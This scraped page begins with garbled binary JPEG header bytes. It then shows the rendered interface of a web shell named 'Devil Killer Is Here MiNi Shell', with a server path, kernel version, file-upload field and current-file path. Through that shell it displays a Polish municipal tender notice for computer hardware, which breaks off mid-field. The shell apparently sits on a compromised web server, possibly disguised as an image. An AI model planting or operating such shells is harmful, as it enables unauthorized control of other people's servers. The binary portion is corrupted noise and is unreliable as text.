JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220622/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220622/0021874801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa sprzętu komputerowego w ramach projektu Cyfrowa Gmina </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Rzekuń</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 550667959</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kościuszki 33</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rzekuń</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">07-411</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL924 - Ostrołęcki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">awierzba@rzekun.net</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rzekun.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa sprzętu komputerowego w ramach projektu Cyfrowa Gmina </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a61687c7-f207-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00218748</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Program Operacyjny Polska Cyfrowa na lata 2014-2020 Osi na lata 2014-2020 Osi Priorytetowej V Rozwój cyfrowej JST oraz wzmocnienie cyfrowej pt. Cyfrowa Gmna-Wsparcie dzieci z rodzin peegerowskich w rozwoju cyfrowym- ,,Granty PPGR&#34; </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.rzekun.pl/zamowienia-publiczne/przetargi.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami<br/>odbywasię przy użyciu miniPortalu (https://miniportal.uzp.gov.pl/, ePUAPu dostępnego pod<br/>adresem:https://epuap.gov.pl/wps/portal) oraz poczty elektronicznej.2. Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na<br/>ePUAP.Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy:„Formularz<br/>do złożenia, zmiany,wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”. 3.Wymagania<br/>techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,elektronicznych kopii<br/>dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w<br/>Regulaminie korzystania z systemu miniPortalu oraz Warunkach korzystania z elektronicznej platformy<br/>usług administracji publicznej ( ePUAP ).4. Maksymalny rozmiar plików przesyłanych za<br/>pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku”i<br/>„Formularza do komunikacji” wynosi 150 MB.5. Za datę przekazania oferty, wniosków,<br/>zawiadomień,dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub<br/>oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP. 6. Zamawiający<br/>przekazuje link do postępowania oraz ID postępowania jako załącznik do niniejszej SWZ. Dane<br/>postępowanie można wyszukać również na Liście wszystkich postępowań klikając wcześniej opcję „Dla<br/>Wykonawców” lub ze strony głównej z zakładki Postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 Ogólnego Rozporządzenia o<br/>Ochronie Danych (RODO) informujemy, że:<br/>1) Administratorem danych osobowych Wykonawców biorących udział w postępowaniu o udzielenie<br/>zamówienia publicznego jest Urząd Gminy w Rzekuniu, adres: ul. Kościuszki 33, 07-411 Rzekuń;<br/>2) Administrator wyznaczył Inspektora Ochrony Danych, z którym mogę się kontaktować w sprawach<br/>przetwarzania moich danych osobowych za pośrednictwem poczty elektronicznej: ug@rzekun.pl;<br/>3) Administrator będzie przetwarzał Państwa dane osobowe na podstawie art. 6 ust. 1 lit. c RODO w<br/>zw. z ustawą z dnia 11 września 2019 r. – Prawo zamówień publicznych (Pzp) w celu związanym z<br/>prowadzonym postępowaniem o udzielenie zamówienia publicznego;<br/>4) Dane osobowe mogą być udostępnione innym uprawnionym podmiotom, na podstawie przepisów<br/>prawa, a także podmiotom, z którymi Administrator zawarł umowę w związku z realizacją usług na<br/>rzecz Administratora (np. kancelarią prawną, dostawcą oprogramowania, zewnętrznym audytorem).<br/>Odbiorcami danych będą także osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 r. – Prawo<br/>zamówień publicznych (Pzp);<br/>5) Administrator nie zamierza przekazywać Państwa danych osobowych do państwa trzeciego lub<br/>organizacji międzynarodowej;<br/>6) Mają Państwo prawo uzyskać kopię swoich danych osobowych w siedzibie Administratora.<br/>Dodatkowo zgodnie z art. 13 ust. 2 RODO informujemy, że:<br/>1) Państwa dane osobowe będą przetwarzane przez okres wskazany w ustawie Pzp albo w przypadku<br/>zamówień realizowanych w ramach projektów (np. współfinansowanych ze środków Unii Europejskiej)<br/>przez okres wskazany w wytycznych w zakresie kwalifikowalności wydatków.<br/>2) Przysługuje Państwu prawo dostępu do treści swoich danych, ich sprostowania lub ograniczenia<br/>przetwarzania, a także prawo do wniesienia skargi do organu nadzorczego, tj. Prezesa Urzędu<br/>Ochrony Danych Osobowych, przy czym:<br/>a. w przypadku obowiązków wynikających z art. 15 ust. 1-3 RODO zamawiający ma prawo żądać od<br/>osoby, której dane dotyczą wskazania dodatkowych informacji mających na celu sprecyzowanie<br/>żądania, w szczególności podania nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia;<br/>b. skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznego ani zmianą postanowień umowy w sprawie<br/>zamówienia publicznego w zakresie niezgodnym z ustawą oraz nie może naruszać integralności<br/>protokołu oraz jego załączników;<br/>c. prawo do ograniczenia przetwarzania danych osobowych nie ogranicza przetwarzania danych<br/>osobowych do czasu zakończenia tego postępowania. Prawo do ograniczenia przetwarzania danych<br/>osobowych nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania<br/>ze środków ochrony prawnej w celu ochrony praw innej osoby fizycznej i prawnej, lub z uwagi na<br/>ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.<br/>3) Podanie danych osobowych jest dobrowolne, jednakże niezbędne do przeprowadzenia<br/>postępowaniem o udzielenie zamówienia publicznego. Konsekwencje niepodania danych określa<br/>ustawa Pzp. Administrator nie podejmuje decyzji w sposób zautomatyzowany w oparciu o Państwa<br/>dane osobowe.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">FPZ.271.1.11.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 318528,85 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Stacje robocze (35 szt.)<br/>1<br/>Obudowa<br/> • All-in-One (monitor zintegrowany z jednostką centralną);<br/> • Dostęp do płyty głównej komputera bez użycia dodatkowych narzędzi.<br/> • Montaż i demontaż podstawy jednostki bez użycia dodatkowych narzędzi.<br/> • Podstawa umożliwiająca regulacje „monitora”: kąt nachylenia, obrót (pivot), wysokość oraz obracanie ekranu na boki.<br/> • Włącznik zasilania umieszczony na frontowej części jednostki.<br/> • Podstawa zawierająca rozwiązania ułatwiające organizację okablowania.<br/> • Slot na zabezpieczenie Kensington.<br/> • Sygnalizacja optyczna stanu pracy zasilacza.<br/> • Sygnalizacja optyczna pracy jednostki (na froncie lub z boku).<br/> • Sygnalizacja optyczna pracy dysku twardego (na froncie lub z boku).<br/> • Kolorystyka: stonowana, biznesowa.<br/>2<br/>Ekran<br/> • Przekątna minimum 23,8 cala.<br/> • Rozdzielczość natywna minimum 1920x1080p.<br/> • Jasność minimum 200 nitów.<br/> • Kontrast minimum 700:1.<br/> • Kąty widzenia minimum: 170 st. w pionie i poziomie.<br/> • Powierzchnia: matowa, antyodblaskowa.<br/> • Matryca klasy IPS lub VA.<br/>3<br/>Procesor<br/> • Minimum 6 rdzeni (12T) o częstotliwości bazowej minimum 3,2 GHz.<br/> • Osiągający wynik Passmark (minimalnie): 2800 dla jednego rdzenia i minimum 12000 łącznie dla wszystkich rdzeni.<br/>4<br/>Pamięć operacyjna<br/> • Minimum 16GB DDR4 non ECC<br/> • Rozszerzalna do minimum 32 GB<br/>5<br/>Pamięć dyskowa<br/> • Minimum 500GB PCIe NVMe SSD.<br/>6<br/>Karta graficzna<br/> • Zintegrowana z procesorem.<br/>7<br/>Łączność<br/> • karta sieciowa Ethernet wbudowana przez producenta jednostki: 10/100/1000 Mbps<br/> • karta sieciowa Wi-Fi wbudowana przez producenta jednostki: Wi-Fi 802.11 a/b/g, Wi-Fi 4 (WiFi 802.11n), Wi-Fi 5 (WiFi 802.11ac), Wi-Fi 6 (WiFi 802.11ax)<br/> • Bluetooth 5.0<br/>8<br/>Kamera<br/> • Zintegrowana z obudową jednostki (nierozłączna).<br/> • Z rozwiązaniem pozwalającym na mechaniczne zakrycie/chowanie.<br/> • Optyczna sygnalizacja informującą o pracy kamery.<br/> • Rozdzielczość natywna minimum 1920 x 1080p przy 30 kl/s<br/>9<br/>Mikrofon<br/> • Zintegrowany z obudową jednostki (nierozłączny).<br/>10<br/>Czytnik kart<br/> • Zintegrowany z obudową jednostki (nierozłączny).<br/> • Obsługa kart: SDHC, SDXC, SD 4.0, SD UHS-I, SD UHS-II.<br/>11<br/>Głośniki<br/> • Minimum 2 x 4W.<br/> • Zintegrowane z obudową jednostki (nierozłączne).<br/>12<br/>Zasilanie<br/> • Zasilacz zintegrowany w obudowie jednostki (nierozłączny).<br/> • Certyfikat sprawności zasilacza minimum „80 Plus Bronze”.<br/> • Zgodność z ErP Lot6 Tier 2<br/> • Zgodność z Energy Star 8.0<br/> • Maksymalna moc zasilacza: 180 W.<br/>13<br/>Złącza zewnętrzne<br/> • Dostępne z przodu lub boku jednostki: czytnik kart SD, gniazdo audio combo, port USB 3.1, port USB 3.1 Typ C<br/> • Pozostałe: HDMI 1.4 IN lub DisplayPort IN, HDMI 2.0 OUT lub DisplayPort++ 1.4a/HDCP 2.3, RJ45 Ethernet, minimum 4x port USB 3.1, Audio out, gnizado zasilania.<br/>14<br/>Złącza wewnętrzne<br/> • Minimum 1 wolne gniazdo PCIe NVMe Gen4 x4 na dysk M.2 2230/2280 SSD<br/> • Minimum 1 wolne gniazdo SATA3 na dysk 2,5 cala<br/> • Minimum 2 gniazda SO-DIMM DDR4 lub DDR5<br/>15<br/>Klawiatura<br/> • Bezprzewodowa z sygnalizacją klawiszy przełączających (Caps Lock, itd.)<br/> • Układ: QWERTY, US International<br/> • współużytkująca odbiornik 2.4GHz z myszą.<br/>16<br/>Mysz<br/> • Bezprzewodowa z rolką współużytkująca odbiornik 2.4GHz z klawiaturą.<br/>17<br/>System operacyjny<br/> • Microsoft Windows 11 Professional PL 64-bit z możliwością/ licencją downgrade’u do Windows 10 Professional PL 64-bit<br/>18<br/>Gwarancja producenta <br/> • 36 miesięcy z możliwością zachowania dysku twardego </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213000-5 - Komputery osobiste</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Serwery (2 szt): <br/>Lp.<br/>Parametr<br/>Wymagania<br/>1<br/>Zgodność<br/> • Potwierdzona zgodność dla producenta, modelu i rodziny procesorów z ESXi 7.0 U3 na liście „VMware Compatibility Guide” (https://www.vmware.com/resources/compatibility/search.php)<br/>2<br/>Przeznaczenie i warunki użytkowania<br/> • Server/Enterprise<br/>3<br/>Obudowa<br/> • Typ: Rack, maksymalnie 2U, <br/> • z szynami ruchomymi i ramieniem na kable,<br/> • wyposażona w wyświetlacz LCD informujący o stanie serwera,<br/> • posiadająca rozwiązanie chroniące dyski przed nieuprawnionym wyjęciem.<br/> • obsługująca minimalnie 8 dysków SAS/SATA 3.5cala<br/>4<br/>Procesory<br/> • Minimum dwa procesory, każdy minimum 16-rdzeniowy (32T) o częstotliwości bazowej minimum 2.4 GHz.<br/>5<br/>Pamięć operacyjna<br/> • Minimalnie 4 x 32GB DDR4 RDIMM Dual Rank ECC<br/>6<br/>Kontroler RAID<br/> • Sprzętowy, <br/> • minimalnie 8 GB cache, <br/> • obsługa RAID 0/1/5/6/10/50/60, <br/> • obsługa interfejsów SAS/SATA, <br/> • PCIe Gen. 4.<br/>7<br/>Dyski twarde<br/> • 4x 3,5” 8TB HDD NLSAS 7.2k SAS 12Gb/s w obudowie Hot-Plug,<br/> • 4x 2,5” 960GB SSD SATA 6Gb/s (przeznaczenie read intensive) w obudowie Hot-Plug<br/>8<br/>Napęd<br/> • DVD-ROM, wewnętrzny<br/>9<br/>Karty sieciowe<br/> • 2x RJ-45, 1Gb/s, 1000Base-T<br/> • 2x RJ-45, 10Gb/s, 10GBase-T<br/> • 2x SFP+, 10Gb/s, SFP+<br/>10<br/>Zasilanie<br/> • Dwa redundantne zasilacze.<br/>11<br/>Oprogramowanie<br/> • Microsoft Windows Server 2022 Standard (16 CORE) <br/>12<br/>Zdalne zarządzanie<br/> • Moduł zdalnego zarządzania, diagnostyki i monitorowania pracy serwera z dedykowanym portem RJ-45.<br/>13<br/>Gwarancja producenta <br/> 60 miesięcy gwarancji w trybie „Next Business Day” z możliwością pozostawienia dysków twardych w przypadku awarii u użytkownika </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30237400-3 - Akcesoria do wprowadzania danych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Komputery przenośne (30 szt.):<br/>Lp.<br/>Parametr<br/>Wymagania<br/>1<br/>Obudowa<br/> • Kolorystyka: stonowana, biznesowa<br/> • Możliwość zabezpieczenia linką (port Kensington Lock)<br/>2<br/>Ekran<br/> • Przekątna minimalna 15,6 cala<br/> • Powierznia matowa<br/> • Rozdzielczość natywna 1920 x 1080 (Full HD) <br/> • Jasność minimalna 250 cd/m2<br/> • Matryca klasy IPS lub VA<br/>3<br/>Procesor<br/> • Minimalnie 2 rdzenie (4T), częstotliwość bazowa minimalnie 3 GHz, osiągający wynik Passmark (minimalnie): 2600 dla jednego rdzenia i minimalnie 6000 łącznie dla wszystkich rdzeni.<br/>4<br/>Pamięć operacyjna<br/> • Minimalnie 1x8 GB DDR4, rozszerzalna do minimum 16 GB<br/>5<br/>Pamięć dyskowa<br/> • Minimalnie 480 GB <br/> • Typ: SSD<br/>6<br/>Karta graficzna<br/> • Zintegrowana z procesorem.<br/>7<br/>Łączność<br/> • Wi-Fi: minimum Wi-Fi 802.11 b/g/n<br/> • Bluetooth 4.1<br/>8<br/>Kamera<br/> • Wbudowana<br/>9<br/>Mikrofon<br/> • Wbudowany<br/>11<br/>Głośniki<br/> • Wbudowane, stereo<br/>13<br/>Złącza zewnętrzne<br/> • USB 2.0 – minimum 1 szt.<br/> • USB 3.2 - minimum 1 szt.<br/> • USB Typu-C – minimum 1 szt.<br/> • HDMI 1.4 – minimum 1 szt.<br/> • Wyjście słuchawkowe/wejście mikrofonowe (audio combo) - 1 szt.<br/>15<br/>Klawiatura<br/> • Wydzielona klawiatura numeryczna<br/> • Touchpad<br/>16<br/>Bateria<br/> • Tak<br/><br/>Waga<br/> • Maksymalnie 1,8 kg (bez zasilacza, z baterią).<br/>17<br/>System operacyjny<br/> • System operacyjny powinien udostępniać narzędzia wspomagające osoby niepełnosprawne : podpisy kodowane, wizualne wyświetlanie alertów systemowych, dźwięk monofoniczny, duży kontrast wyświetlanego obrazu, powiększenie obrazu (lupa), narrator, filtry kolorów do ekranu, dostosowywanie wielkości i wyglądu kursora i wskaźnika myszy.<br/> • System operacyjny i system pomocy (zainstalowany w systemie) powinien być w wersji polskiej.<br/> • wsparcie techniczne i aktualizacje systemu operacyjnego i programu antywirusowego powinno być dostępne do minimum końca 2025 r.<br/>18<br/>Gwarancja producenta <br/> • Minimalnie 24 miesiące.<br/>19<br/>Ubezpieczenie<br/> • Ochrona na wypadek przypadkowego uszkodzenia, zalania, przepięcia prądu na okres 36 miesięcy wskazany przez Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny 